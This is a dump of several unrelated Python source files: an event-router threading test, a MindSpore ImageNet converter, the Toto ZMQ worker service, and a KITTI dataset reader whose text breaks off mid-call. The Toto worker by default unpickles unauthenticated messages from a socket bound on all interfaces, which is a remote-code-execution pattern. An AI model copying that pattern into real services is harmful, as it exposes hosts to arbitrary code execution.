from EventLib.EventRouterThreaded import EventRouterThreaded
from TestEventRouter import TestEventRouter
# Event handler functions
# These simply store values in the event handler object that
# can be observed later
def subHandler(h, sts):
    """Subscription-open callback: record the status and bump h.subcount."""
    Trace("%s subHandler %s"%(h,str(sts)), "EventLib.TestEventRouterThreaded")
    h.dosub = sts
    h.subcount += 1
    return
def unsubHandler(h, sts):
    """Subscription-close callback: record the status and decrement h.subcount."""
    Trace("%s unsubHandler %s"%(h,str(sts)), "EventLib.TestEventRouterThreaded")
    h.unsub = sts
    h.subcount -= 1
    return
def eventHandler(h, e):
    """Event-delivery callback: store the event, count it and ack immediately."""
    Trace("%s eventHandler %s"%(h,str(e)), "EventLib.TestEventRouterThreaded")
    h.event = e
    h.evcount += 1
    return makeDeferred(StatusVal.OK)
def eventHandlerBlocking(h, e):
    """Event callback that simulates slow processing: sleeps 1s before recording."""
    Trace("%s eventHandlerBlocking %s"%(h,str(e)), "EventLib.TestEventRouterThreaded")
    time.sleep(1.0)
    h.event = e
    h.evcount += 1
    Trace("%s eventHandlerBlocking - return"%(h), "EventLib.TestEventRouterThreaded")
    return makeDeferred(StatusVal.OK)
def eventHandlerQueueing(h, e):
    """Event callback that appends each delivered event to h.queue so tests can
    check delivery order."""
    Trace("%s eventHandlerQueueing %s"%(h,str(e)), "EventLib.TestEventRouterThreaded")
    h.event = e
    h.queue.append(e)
    h.evcount += 1
    return makeDeferred(StatusVal.OK)
# Test class
class TestEventRouterThreaded(TestEventRouter):
    """Re-run the TestEventRouter suite against EventRouterThreaded, plus
    extra cases that check multithreaded delivery behaviour."""

    def setUp(self):
        # Three threaded routers; routes below make R1 the hub.
        self.R1 = EventRouterThreaded("R1")
        self.R2 = EventRouterThreaded("R2")
        self.R3 = EventRouterThreaded("R3")
        # Configure event routers with R1 as hub:
        #
        #      R1
        #     /  \
        #    R2    R3
        #
        # Wildcard event source
        self.R1.routeEventFrom(evtype="R2Events/ev1",router=self.R2)
        self.R1.routeEventFrom(evtype="R3Events/ev1",router=self.R3)
        self.R2.routeEventFrom(evtype="R1Events/ev1",router=self.R1)
        self.R2.routeEventFrom(evtype="R3Events/ev1",router=self.R1)
        self.R3.routeEventFrom(evtype="R1Events/ev1",router=self.R1)
        self.R3.routeEventFrom(evtype="R2Events/ev1",router=self.R1)
        # Wildcard event type
        self.R1.routeEventFrom(source="R2Source/src1",router=self.R2)
        self.R1.routeEventFrom(source="R3Source/src1",router=self.R3)
        self.R2.routeEventFrom(source="R1Source/src1",router=self.R1)
        self.R2.routeEventFrom(source="R3Source/src1",router=self.R1)
        self.R3.routeEventFrom(source="R1Source/src1",router=self.R1)
        self.R3.routeEventFrom(source="R2Source/src1",router=self.R1)
        # Wildcard none
        self.R1.routeEventFrom(evtype="R2Events1/ev1",source="R2Source1/src1",router=self.R2)
        self.R1.routeEventFrom(evtype="R3Events1/ev1",source="R3Source1/src1",router=self.R3)
        self.R2.routeEventFrom(evtype="R1Events1/ev1",source="R1Source1/src1",router=self.R1)
        self.R2.routeEventFrom(evtype="R3Events1/ev1",source="R3Source1/src1",router=self.R1)
        self.R3.routeEventFrom(evtype="R1Events1/ev1",source="R1Source1/src1",router=self.R1)
        self.R3.routeEventFrom(evtype="R2Events1/ev1",source="R2Source1/src1",router=self.R1)
        # Cross routing event
        self.R1.routeEventFrom(evtype="RREvents2/ev1",source="RRSource2/src1",router=self.R2)
        self.R2.routeEventFrom(evtype="RREvents2/ev1",source="RRSource2/src1",router=self.R1)
        # 3-way loop routing event
        self.R1.routeEventFrom(evtype="RREvents3/ev1",source="RRSource3/src1",router=self.R2)
        self.R2.routeEventFrom(evtype="RREvents3/ev1",source="RRSource3/src1",router=self.R3)
        self.R3.routeEventFrom(evtype="RREvents3/ev1",source="RRSource3/src1",router=self.R1)
        return

    def tearDown(self):
        # Shut down router worker threads between tests.
        self.R1.close()
        self.R2.close()
        self.R3.close()
        return

    # Test support functions

    # One-hop routing test: R1 -> R2
    def doSubscriptionForwardingR1R2(self, evtype, source, evmatch, evdrop, r1fwd=0):
        # delay gives the threaded routers time to propagate subscriptions.
        self.doSubscriptionForwarding(self.R1, self.R2, evtype, source, evmatch, evdrop,
            r1fwd=r1fwd, delay=0.1)
        return

    # Two-hop routing test: R2 -> R3 (via R1 - see method setUp)
    def doSubscriptionForwardingR2R3(self, evtype, source, evmatch, evdrop, r1fwd=0):
        self.doSubscriptionForwarding(self.R2, self.R3, evtype, source, evmatch, evdrop,
            r1fwd=r1fwd, rvia=self.R1, delay=0.1)
        return

    # Test cases

    # Test behaviour of blocking in event delivery
    def testBlockingEventDelivery(self):
        es = makeEventAgent(uri="es")
        eh = makeEventHandler(
            uri="eh", handler=eventHandlerBlocking,
            initSubscription=subHandler, endSubscription=unsubHandler)
        eh.subcount = 0
        eh.evcount = 0
        evtyp = "R3Events1/ev1"     # Select event routed R3 -> R1 -> R2 ..
        evsrc = "R3Source1/src1"    # .. (see setUp)
        ev = makeEvent(evtype=evtyp, source=evsrc)
        sts = self.R2.subscribe(60, eh, evtype=evtyp, source=evsrc)
        Trace("Subscribe returned", "EventLib.TestEventRouterThreaded")
        time.sleep(0.1)             # Allow subscribe time to propagate
        Trace("Subscribed", "EventLib.TestEventRouterThreaded")
        self.assertEqual(eh.evcount, 0)
        sts = self.R3.publish(es, ev)
        self.assertEqual(eh.evcount, 0)  # Not delivered immediately ...
        Trace("Before sleep", "EventLib.TestEventRouterThreaded")
        time.sleep(1.5)             # Note: event handler blocks for 1 sec
        Trace("After sleep: eh.evcount %d"%(eh.evcount), "EventLib.TestEventRouterThreaded")
        self.assertEqual(eh.evcount, 1)  # ... but sometime after a second
        self.assertEqual(eh.event.getType(), evtyp)
        self.assertEqual(eh.event.getSource(), evsrc)
        Trace("testBlockingEventDelivery OK", "EventLib.TestEventRouterThreaded")
        return

    # Test event publication by two concurrent threads
    def testInterleavedEventDelivery(self):
        # Helpers
        def makePublishThread( es, cq, wait0, wait1, evlist):
            # Publish evlist on a new thread; completion is signalled via cq.
            t = Thread(name=es, target=publishFromThread, args=(es, cq, wait0, wait1, evlist))
            t.start()
            return
        def publishFromThread( es, cq, wait0, wait1, evlist):
            # Publishes each (evtype, source) pair, sleeping wait0 before the
            # first and wait1 before each subsequent publication.
            # NOTE(review): the loop target 'es' shadows the thread-name
            # parameter, so publish() receives the event-source string —
            # looks intentional here but worth confirming.
            n = 0
            for (et,es) in evlist:
                n += 1
                time.sleep(wait0)
                wait0 = wait1
                ev = makeEvent(evtype=et, source=es)
                sts = self.R3.publish(es, ev)
            cq.put(n)
            return
        # Main test case
        evtyp = "R3Events/ev1"      # Select event type routed R3 -> R1 -> R2
        eh = makeEventHandler(
            uri="eh", handler=eventHandlerQueueing,
            initSubscription=subHandler, endSubscription=unsubHandler)
        eh.subcount = 0
        eh.evcount = 0
        eh.event = None
        eh.queue = []
        self.R2.subscribe(60, eh, evtype=evtyp, source=None)
        time.sleep(0.1)             # Allow subscribe time to propagate
        completionQueue = Queue()
        # Two publishers offset by 0.5s so their events interleave.
        makePublishThread( "es1", completionQueue, 0.0, 1.0, ((evtyp,"Pub11"),(evtyp,"Pub12")) )
        makePublishThread( "es2", completionQueue, 0.5, 1.0, ((evtyp,"Pub21"),(evtyp,"Pub22")) )
        c = completionQueue.get()   # Wait for both threads to complete
        c = completionQueue.get()
        # Check state of handler
        time.sleep(0.1)             # Allow events time to propagate
        self.assertEqual(eh.evcount, 4)
        # Expected order by publish time: Pub11(0.0) Pub21(0.5) Pub12(1.0) Pub22(1.5)
        self.assertEqual(eh.queue[0].getType(), evtyp)
        self.assertEqual(eh.queue[0].getSource(), "Pub11")
        self.assertEqual(eh.queue[1].getType(), evtyp)
        self.assertEqual(eh.queue[1].getSource(), "Pub21")
        self.assertEqual(eh.queue[2].getType(), evtyp)
        self.assertEqual(eh.queue[2].getSource(), "Pub12")
        self.assertEqual(eh.queue[3].getType(), evtyp)
        self.assertEqual(eh.queue[3].getSource(), "Pub22")
        return

    # Test behaviour of watching an event subscription
    def testWatch(self):
        es = makeEventAgent(uri="es")
        eh1 = makeEventHandler(
            uri="eh1", handler=eventHandlerBlocking,
            initSubscription=subHandler, endSubscription=unsubHandler)
        eh2 = makeEventHandler(
            uri="eh2", handler=eventHandlerBlocking,
            initSubscription=subHandler, endSubscription=unsubHandler)
        eh3 = makeEventHandler(
            uri="eh3", handler=eventHandlerBlocking,
            initSubscription=subHandler, endSubscription=unsubHandler)
        eh1.subcount = 0
        eh1.evcount = 0
        eh2.subcount = 0
        eh2.evcount = 0
        eh3.subcount = 0
        eh3.evcount = 0
        self.R1.subscribe( 30, eh3, '' )
        self.R1.watch( 30, eh1, 'http://id.webbrick.co.uk/events/config/get' )
        # self.R1.subscribe( 30, eh1, 'http://id.webbrick.co.uk/events/config/set' )
        # self.R1.subscribe( 30, eh2, 'http://id.webbrick.co.uk/events/time/minute' )
        self.R1.subscribe( 30, eh2, 'http://id.webbrick.co.uk/events/config/get' )
        self.R1.unsubscribe( eh3, '' )
        self.R1.endWatch( eh1, 'http://id.webbrick.co.uk/events/config/get' )
        # self.R1.unsubscribe( eh1, 'http://id.webbrick.co.uk/events/config/set' )
        # self.R1.unsubscribe( eh2, 'http://id.webbrick.co.uk/events/time/minute' )
        self.R1.unsubscribe( eh2, 'http://id.webbrick.co.uk/events/config/get' )
        # Balanced subscribe/unsubscribe pairs leave all counts at zero.
        self.assertEqual(eh1.subcount, 0)
        self.assertEqual(eh2.subcount, 0)
        self.assertEqual(eh3.subcount, 0)
        time.sleep(1.5)             # Note: event handler blocks for 1 sec
        return

    def testShutdown(self):
        # ensure test harness shutsdown if no close called
        Rlocal = EventRouterThreaded("Rlocal")
        assert (True)

    # Placeholders referenced by the suite selection in getTestSuite().
    def testUnits(self):
        assert (True)

    def testComponents(self):
        assert (True)

    def testIntegration(self):
        assert (True)
# Assemble test suite
from MiscLib import TestUtils
def getTestSuite(select="unit"):
    """
    Assemble a test suite based on *select*:
        "unit"       suite of unit tests only
        "component"  suite of unit and component tests
        "all"        suite of unit, component and integration tests
        "pending"    suite of pending tests
        <name>       a single named test to be run
    """
    unit_tests = [
        "testUnits",
        "testShutdown",
        "testSubscriptionRouteTable",
        "testSubscriptionForwarding1",
        "testSubscriptionForwarding2",
        "testSubscriptionForwarding3",
        "testSubscriptionForwarding4",
        "testSubscriptionForwarding5",
        "testSubscriptionForwarding6",
        "testSubscriptionForwarding7",
        "testSubscriptionForwarding8",
        "testBlockingEventDelivery",
        "testInterleavedEventDelivery",
    ]
    testdict = {
        "unit": unit_tests,
        "component": ["testComponents"],
        "integration": ["testIntegration"],
        "pending": ["testPending", "testWatch"],
    }
    return TestUtils.getTestSuite(TestEventRouterThreaded, testdict, select=select)
# Run unit tests directly from command line
if __name__ == "__main__":
    # Run selected tests from the command line, logging to the named file.
    TestUtils.runTests("TestEventRouterThreaded.log", getTestSuite, sys.argv)
# End.
|
imagenet_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Imagenet convert tool for MindRecord.
"""
import os
import time
from mindspore import log as logger
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
__all__ = ['ImageNetToMR']
class ImageNetToMR:
    """
    A class to transform from imagenet to MindRecord.

    Args:
        map_file (str): the map file that indicates label. The map file content should be like this:

            .. code-block::

                n02119789 0
                n02100735 1
                n02110185 2
                n02096294 3

        image_dir (str): image directory contains n02119789, n02100735, n02110185 and n02096294 directory.
        destination (str): the MindRecord file path to transform into.
        partition_number (int, optional): partition size. Default: 1.

    Raises:
        ValueError: If `map_file`, `image_dir` or `destination` is invalid.
    """
    def __init__(self, map_file, image_dir, destination, partition_number=1):
        check_filename(map_file)
        self.map_file = map_file
        check_filename(image_dir)
        self.image_dir = image_dir
        check_filename(destination)
        self.destination = destination
        # Reject None and non-int values in one check (the original's extra
        # `is not None` branch raised the same error anyway).
        if not isinstance(partition_number, int):
            raise ValueError("The parameter partition_number must be int")
        self.partition_number = partition_number
        self.writer = FileWriter(self.destination, self.partition_number)

    def _get_imagenet_as_dict(self):
        """
        Get data from imagenet as dict.

        Yields:
            data (dict): one imagenet sample with "file_name", "label" and
            "image" (raw bytes) keys.

        Raises:
            IOError: if the map file does not exist.
            PathNotExistsError: if no label directory from the map file exists.
        """
        real_file_path = os.path.realpath(self.map_file)
        if not os.path.exists(real_file_path):
            raise IOError("map file {} not exists".format(self.map_file))
        # Parse "<wnid> <label>" lines into {label: wnid}; 'with' closes the
        # file even on error, and blank lines are tolerated (the original
        # readline loop raised IndexError on them).
        label_dict = {}
        with open(real_file_path) as fp:
            for line in fp:
                line = line.strip()
                if not line:
                    continue
                labels = line.split(" ")
                label_dict[labels[1]] = labels[0]
        # get all the dir which are n02087046, n02094114, n02109525
        dir_paths = {}
        for item in label_dict:
            real_path = os.path.join(self.image_dir, label_dict[item])
            if not os.path.isdir(real_path):
                logger.warning("{} dir is not exist".format(real_path))
                continue
            dir_paths[item] = real_path
        if not dir_paths:
            raise PathNotExistsError("not valid image dir in {}".format(self.image_dir))
        # get the filename, label and image binary as a dict
        for label in dir_paths:
            for item in os.listdir(dir_paths[label]):
                file_name = os.path.join(dir_paths[label], item)
                if not item.endswith(("JPEG", "jpg")):
                    logger.warning("{} file is not suffix with JPEG/jpg, skip it.".format(file_name))
                    continue
                data = {"file_name": str(file_name), "label": int(label)}
                # 'with' guarantees the handle is closed even if read() raises
                # (the original leaked the descriptor in that case).
                with open(os.path.realpath(file_name), "rb") as image_file:
                    image_bytes = image_file.read()
                if not image_bytes:
                    logger.warning("The image file: {} is invalid.".format(file_name))
                    continue
                data["image"] = image_bytes
                yield data

    def run(self):
        """
        Execute transformation from imagenet to MindRecord.

        Returns:
            MSRStatus, whether imagenet is successfully transformed to MindRecord.
        """
        t0_total = time.time()
        imagenet_schema_json = {"label": {"type": "int32"},
                                "image": {"type": "bytes"},
                                "file_name": {"type": "string"}}
        logger.info("transformed MindRecord schema is: {}".format(imagenet_schema_json))
        # set the header size
        self.writer.set_header_size(1 << 24)
        # set the page size
        self.writer.set_page_size(1 << 26)
        # create the schema
        self.writer.add_schema(imagenet_schema_json, "imagenet_schema")
        # add the index
        self.writer.add_index(["label", "file_name"])
        imagenet_iter = self._get_imagenet_as_dict()
        batch_size = 256
        transform_count = 0
        # Write in batches of batch_size; the final partial batch is flushed
        # when the generator is exhausted.
        while True:
            data_list = []
            try:
                for _ in range(batch_size):
                    data_list.append(next(imagenet_iter))
                    transform_count += 1
                self.writer.write_raw_data(data_list)
                logger.info("transformed {} record...".format(transform_count))
            except StopIteration:
                if data_list:
                    self.writer.write_raw_data(data_list)
                    logger.info("transformed {} record...".format(transform_count))
                break
        ret = self.writer.commit()
        t1_total = time.time()
        logger.info("--------------------------------------------")
        logger.info("END. Total time: {}".format(t1_total - t0_total))
        logger.info("--------------------------------------------")
        return ret

    def transform(self):
        """
        Encapsulate the run function to exit normally.

        Runs `run` on a daemon ExceptionThread so that an exception raised in
        the worker is re-raised in the caller after join().
        """
        t = ExceptionThread(target=self.run)
        t.daemon = True
        t.start()
        t.join()
        if t.exitcode != 0:
            raise t.exception
        return t.res
|
worker.py | '''The Toto worker and worker connection classes are designed to help build RPC systems,
allowing you to pass CPU intensive work to other processeses or machines. Workers
were originally designed for use with the Toto server, making it easy to perform
long running tasks without effecting the server's responsiveness, but they have been
designed to be used independently and have no direct ties to the web server
architecture.
``TotoWorkers`` and ``WorkerConnections`` use ZMQ for messaging and require the ``pyzmq`` module.
The ``TotoWorkerService`` has a built in message router that will round-robin balance incoming
messages. The router can be disabled through configuration if only one worker process is needed.
Alternatively, the router can be configured to run without any worker processes, allowing multiple
machines to share a common router.
Most of the time you'll only need this script to start your server::
from toto.worker import TotoWorkerService
TotoWorkerService('settings.conf').run()
Methods, startup functions and databases can all be configured with the conf file.
Run your startup script with --help to see all available options.
'''
import os
import zmq
from zmq.devices.basedevice import ProcessDevice
import tornado
from tornado.options import options
import logging
import zlib
import cPickle as pickle
import sys
import time
from threading import Thread
from multiprocessing import Process, cpu_count
from toto.service import TotoService, process_count, pid_path
from toto.dbconnection import configured_connection
from exceptions import *
from toto.options import safe_define
# Worker-service configuration options. safe_define avoids duplicate-definition
# errors if this module is imported more than once.
safe_define("method_module", default='methods', help="The root module to use for method lookup")
safe_define("remote_event_receivers", type=str, help="A comma separated list of remote event address that this event manager should connect to. e.g.: 'tcp://192.168.1.2:8889'", multiple=True)
safe_define("event_init_module", default=None, type=str, help="If defined, this module's 'invoke' function will be called with the EventManager instance after the main event handler is registered (e.g.: myevents.setup)")
safe_define("startup_function", default=None, type=str, help="An optional function to run on startup - e.g. module.function. The function will be called for each worker process after it is configured and before it starts listening for tasks with the named parameters worker and db_connection.")
safe_define("worker_bind_address", default="tcp://*:55555", help="The service will bind to this address with a zmq PULL socket and listen for incoming tasks. Tasks will be load balanced to all workers. If this is set to an empty string, workers will connect directly to worker_socket_address.")
safe_define("worker_socket_address", default="ipc:///tmp/workerservice.sock", help="The load balancer will use this address to coordinate tasks between local workers")
safe_define("control_socket_address", default="ipc:///tmp/workercontrol.sock", help="Workers will subscribe to messages on this socket and listen for control commands. If this is an empty string, the command option will have no effect")
safe_define("command", type=str, metavar='status|shutdown', help="Specify a command to send to running workers on the control socket")
safe_define("compression_module", type=str, help="The module to use for compressing and decompressing messages. The module must have 'decompress' and 'compress' methods. If not specified, no compression will be used. You can also set worker.compress and worker.decompress in your startup method for increased flexibility")
safe_define("serialization_module", type=str, help="The module to use for serializing and deserializing messages. The module must have 'dumps' and 'loads' methods. If not specified, cPickle will be used. You can also set worker.dumps and worker.loads in your startup method for increased flexibility")
class TotoWorkerService(TotoService):
    '''Instances can be configured in three ways:

    1. (Most common) Pass the path to a config file as the first parameter to the constructor.
    2. Pass config parameters as command line arguments to the initialization script.
    3. Pass keyword arguments to the constructor.

    Precidence is as follows:

    Keyword args, config file, command line
    '''

    def __init__(self, conf_file=None, **kwargs):
        # The modules named by these options may themselves define options, so
        # they must be imported before the full option set is parsed.
        module_options = {'method_module', 'event_init_module'}
        function_options = {'startup_function'}
        # Temporarily restrict argv to just the module options for the first
        # (partial) option-loading pass.
        original_argv, sys.argv = sys.argv, [i for i in sys.argv if i.strip('-').split('=')[0] in module_options]
        self._load_options(conf_file, **{i: kwargs[i] for i in kwargs if i in module_options})
        modules = {getattr(options, i) for i in module_options if getattr(options, i)}
        for module in modules:
            __import__(module)
        function_modules = {getattr(options, i).rsplit('.', 1)[0] for i in function_options if getattr(options, i)}
        for module in function_modules:
            __import__(module)
        sys.argv = original_argv
        #clear root logger handlers to prevent duplicate logging if user has specified a log file
        super(TotoWorkerService, self).__init__(conf_file, **kwargs)
        #clear method_module references so we can fully reload with new options
        for module in modules:
            for i in (m for m in sys.modules.keys() if m.startswith(module)):
                del sys.modules[i]
        for module in function_modules:
            for i in (m for m in sys.modules.keys() if m.startswith(module)):
                del sys.modules[i]
        #prevent the reloaded module from re-defining options
        define, tornado.options.define = tornado.options.define, lambda *args, **kwargs: None
        self.__event_init = options.event_init_module and __import__(options.event_init_module) or None
        self.__method_module = options.method_module and __import__(options.method_module) or None
        tornado.options.define = define

    def prepare(self):
        """Start the optional zmq load-balancer device before workers fork."""
        self.balancer = None
        if options.worker_bind_address:
            # ROUTER/DEALER queue device: binds the public worker_bind_address
            # and forwards tasks to local workers on worker_socket_address.
            self.balancer = ProcessDevice(zmq.QUEUE, zmq.ROUTER, zmq.DEALER)
            self.balancer.daemon = True
            self.balancer.bind_in(options.worker_bind_address)
            self.balancer.bind_out(options.worker_socket_address)
            self.balancer.setsockopt_in(zmq.IDENTITY, 'ROUTER')
            self.balancer.setsockopt_out(zmq.IDENTITY, 'DEALER')
            self.balancer.start()
            if options.daemon:
                # Record the balancer's pid so daemon management can stop it.
                with open(pid_path(0), 'wb') as f:
                    f.write(str(self.balancer.launcher.pid))
        count = options.processes if options.processes >= 0 else cpu_count()
        if count == 0:
            print 'Starting load balancer. Listening on "%s". Routing to "%s"' % (options.worker_bind_address, options.worker_socket_address)
        else:
            print "Starting %s worker process%s. %s." % (count, count > 1 and 'es' or '', options.worker_bind_address and ('Listening on "%s"' % options.worker_bind_address) or ('Connecting to "%s"' % options.worker_socket_address))

    def main_loop(self):
        """Worker process body: connect the DB, optionally wire up remote event
        receivers, then run a TotoWorker until shutdown."""
        db_connection = configured_connection()
        if options.remote_event_receivers:
            from toto.events import EventManager
            event_manager = EventManager.instance()
            # NOTE(review): the guard reads options.remote_instances while the
            # loop reads options.remote_event_receivers — looks like a typo;
            # confirm which option is intended.
            if options.remote_instances:
                for address in options.remote_event_receivers.split(','):
                    event_manager.register_server(address)
            init_module = self.__event_init
            if init_module:
                init_module.invoke(event_manager)
        serialization = options.serialization_module and __import__(options.serialization_module) or pickle
        compression = options.compression_module and __import__(options.compression_module)
        worker = TotoWorker(self.__method_module, options.worker_socket_address, db_connection, compression, serialization)
        if options.startup_function:
            # NOTE(review): rsplit('.') has no maxsplit, so a dotted path with
            # more than two components will index the wrong module — verify.
            startup_path = options.startup_function.rsplit('.')
            __import__(startup_path[0]).__dict__[startup_path[1]](worker=worker, db_connection=db_connection)
        worker.start()

    def send_worker_command(self, command):
        """Publish *command* on the control socket so running workers act on it."""
        if options.control_socket_address:
            socket = zmq.Context().socket(zmq.PUB)
            socket.bind(options.control_socket_address)
            # Give subscribers time to connect before publishing (zmq slow-joiner).
            time.sleep(1)
            socket.send_string('command %s' % command)
            print "Sent command: %s" % options.command

    def run(self):
        # If a control command was given, send it and exit instead of serving.
        if options.command:
            self.send_worker_command(options.command)
            return
        super(TotoWorkerService, self).run()
class TotoWorker():
    '''The worker is responsible for processing all RPC calls. An instance
    will be initialized for each incoming request.

    You can set the module to use for method delegation via the ``method_module`` parameter.
    Methods are modules that contain an invoke function::

        def invoke(handler, parameters)

    The request worker instance will be passed as the first parameter to the invoke function and
    provides access to the server's database connection. Request parameters will be passed as the
    second argument to the invoke function.

    Any value returned from a method invocation will be sent to the caller, closing the
    message->response cycle. If you only need to let the caller know that the task has begun, you
    should decorate your ``invoke`` function with ``@toto.invocation.asynchronous`` to send a
    response before processing begins.
    '''

    def __init__(self, method_module, socket_address, db_connection, compression=None, serialization=None):
        self.context = zmq.Context()
        self.socket_address = socket_address
        self.method_module = method_module
        self.db_connection = db_connection
        # Convenience handle to the underlying db object (None if no connection).
        self.db = db_connection and db_connection.db or None
        self.status = 'Initialized'
        self.running = False
        # Pluggable (de)compression/(de)serialization; identity and cPickle
        # are the defaults.
        self.compress = compression and compression.compress or (lambda x: x)
        self.decompress = compression and compression.decompress or (lambda x: x)
        self.loads = serialization and serialization.loads or pickle.loads
        self.dumps = serialization and serialization.dumps or pickle.dumps
        if options.debug:
            from traceback import format_exc
            # Debug mode: replace error_info on the *class* with a variant
            # that logs the full traceback.
            def error_info(self, e):
                if not isinstance(e, TotoException):
                    e = TotoException(ERROR_SERVER, str(e))
                logging.error('%s\n%s\n' % (e, format_exc()))
                return e.__dict__
            TotoWorker.error_info = error_info

    def error_info(self, e):
        # Default (non-debug) error reporter: wrap in TotoException, log the
        # message only, and return a dict suitable for sending to the caller.
        if not isinstance(e, TotoException):
            e = TotoException(ERROR_SERVER, str(e))
        logging.error(str(e))
        return e.__dict__

    def log_status(self):
        logging.info('Pid: %s status: %s' % (os.getpid(), self.status))

    def __monitor_control(self, address=options.control_socket_address):
        # NOTE: the default address is captured once, at class-definition time.
        def monitor():
            # Subscribe to 'command ...' messages and react until shutdown.
            socket = self.context.socket(zmq.SUB)
            socket.setsockopt(zmq.SUBSCRIBE, 'command')
            socket.connect(address)
            while self.running:
                try:
                    command = socket.recv().split(' ', 1)[1]
                    logging.info("Received command: %s" % command)
                    if command == 'shutdown':
                        self.running = False
                        self.context.term()
                        return
                    elif command == 'status':
                        self.log_status()
                except Exception as e:
                    self.error_info(e)
        if address:
            thread = Thread(target=monitor)
            thread.daemon = True
            thread.start()

    def start(self):
        """Main request loop: receive a task, dispatch to the named method
        module, and reply (immediately for @asynchronous methods)."""
        self.running = True
        self.__monitor_control()
        socket = self.context.socket(zmq.REP)
        socket.connect(self.socket_address)
        # pending_reply tracks whether the REP socket still owes a response,
        # so the except clause can send an error frame and keep the REQ/REP
        # state machine valid.
        pending_reply = False
        while self.running:
            try:
                self.status = 'Listening'
                message = socket.recv_multipart()
                pending_reply = True
                message_id = message[0]
                data = self.loads(self.decompress(message[1]))
                logging.info('Received Task %s: %s' % (message_id, data['method']))
                # Resolve the dotted method path within method_module.
                method = self.method_module
                for i in data['method'].split('.'):
                    method = getattr(method, i)
                if hasattr(method.invoke, 'asynchronous'):
                    # Ack immediately, then do the work without replying again.
                    socket.send_multipart((message_id,))
                    pending_reply = False
                    self.status = 'Working'
                    method.invoke(self, data['parameters'])
                else:
                    self.status = 'Working'
                    response = method.invoke(self, data['parameters'])
                    socket.send_multipart((message_id, self.compress(self.dumps(response))))
                    pending_reply = False
            except Exception as e:
                if pending_reply:
                    socket.send_multipart((message_id, self.compress(self.dumps({'error': self.error_info(e)}))))
        self.status = 'Finished'
        self.log_status()
|
dataset.py | import numpy as np
import cv2
import os
import time
from collections import defaultdict, namedtuple
from threading import Thread, Lock
from multiprocessing import Process, Queue
class ImageReader(object):
    """Reads images on demand from a list of file paths, with an optional
    read-ahead cache and optional camera rectification."""

    def __init__(self, ids, timestamps, cam=None):
        self.ids = ids
        self.timestamps = timestamps
        self.cam = cam
        self.cache = dict()
        self.idx = 0
        self.ahead = 10      # number of images to prefetch past the current index
        self.waiting = 1.5   # seconds of inactivity after which preloading stops
        # NOTE: the preload thread is created but never started (start() was
        # left disabled in the original).
        self.preload_thread = Thread(target=self.preload)
        self.thread_started = False

    def read(self, path):
        raw = cv2.imread(path, -1)
        return raw if self.cam is None else self.cam.rectify(raw)

    def preload(self):
        last_idx = self.idx
        last_activity = float('inf')  # 'inf' => never time out before first move
        while True:
            if time.time() - last_activity > self.waiting:
                return
            if self.idx == last_idx:
                time.sleep(1e-2)
                continue
            # The index moved: prefetch a window of images ahead of it.
            for i in range(self.idx, self.idx + self.ahead):
                if i not in self.cache and i < len(self.ids):
                    self.cache[i] = self.read(self.ids[i])
            if self.idx + self.ahead > len(self.ids):
                return
            last_idx = self.idx
            last_activity = time.time()

    def __len__(self):
        return len(self.ids)

    def __getitem__(self, idx):
        self.idx = idx
        if idx in self.cache:
            # Serve from the cache and drop the entry (each image is read once).
            return self.cache.pop(idx)
        return self.read(self.ids[idx])

    def __iter__(self):
        for i, stamp in enumerate(self.timestamps):
            yield stamp, self[i]

    @property
    def dtype(self):
        return self[0].dtype

    @property
    def shape(self):
        return self[0].shape
class KITTIOdometry(object):  # without lidar
    '''
    path example: 'path/to/your/KITTI odometry dataset/sequences/00'
    '''
    def __init__(self, path):
        # Hard-coded rectified pinhole intrinsics for the KITTI camera rigs;
        # which one applies depends on the sequence number extracted below.
        Cam = namedtuple('cam', 'fx fy cx cy width height baseline')
        cam00_02 = Cam(718.856, 718.856, 607.1928, 185.2157, 1241, 376, 0.5371657)
        cam03 = Cam(721.5377, 721.5377, 609.5593, 172.854, 1241, 376, 0.53715)
        cam04_12 = Cam(707.0912, 707.0912, 601.8873, 183.1104, 1241, 376, 0.53715)
        path = os.path.expanduser(path)
        timestamps = np.loadtxt(os.path.join(path, 'times.txt'))
        # image_2 / image_3 hold the left / right camera frames.
        self.left = ImageReader(self.listdir(os.path.join(path, 'image_2')),
            timestamps)
        self.right = ImageReader(self.listdir(os.path.join(path, 'image_3')),
            timestamps)
        assert len(self.left) == len(self.right)
        self.timestamps = self.left.timestamps
        # The sequence number is the last path component (e.g. '.../00' -> 0).
        sequence = int(path.strip(os.path.sep).split(os.path.sep)[-1])
        if sequence < 3:
            self.cam = cam00_02
        elif sequence == 3:
            self.cam = cam03
        elif sequence < 13:
            self.cam = cam04_12
        # NOTE(review): sequences >= 13 leave self.cam unset, so later access
        # raises AttributeError — confirm the intended sequence range.
    def sort(self, xs):
        # Numeric sort on the filename stem ('.png' suffix stripped).
        return sorted(xs, key=lambda x:float(x[:-4]))
    def listdir(self, dir):
        """Absolute paths of all .png files in dir, numerically sorted."""
        files = [_ for _ in os.listdir(dir) if _.endswith('.png')]
        return [os.path.join(dir, _) for _ in self.sort(files)]
    def __len__(self):
        return len(self.left)
class Camera(object):
    """Pinhole camera model with an optional precomputed undistort+rectify map."""

    def __init__(self,
            width, height,
            intrinsic_matrix,
            undistort_rectify=False,
            extrinsic_matrix=None,
            distortion_coeffs=None,
            rectification_matrix=None,
            projection_matrix=None):
        self.width = width
        self.height = height
        self.intrinsic_matrix = intrinsic_matrix
        self.extrinsic_matrix = extrinsic_matrix
        self.distortion_coeffs = distortion_coeffs
        self.rectification_matrix = rectification_matrix
        self.projection_matrix = projection_matrix
        self.undistort_rectify = undistort_rectify
        # Pinhole intrinsics pulled out of the 3x3 matrix for convenient access.
        self.fx, self.fy = intrinsic_matrix[0, 0], intrinsic_matrix[1, 1]
        self.cx, self.cy = intrinsic_matrix[0, 2], intrinsic_matrix[1, 2]
        if not undistort_rectify:
            self.remap = None
        else:
            # Precompute the pixel remapping once; rectify() just applies it.
            self.remap = cv2.initUndistortRectifyMap(
                cameraMatrix=self.intrinsic_matrix,
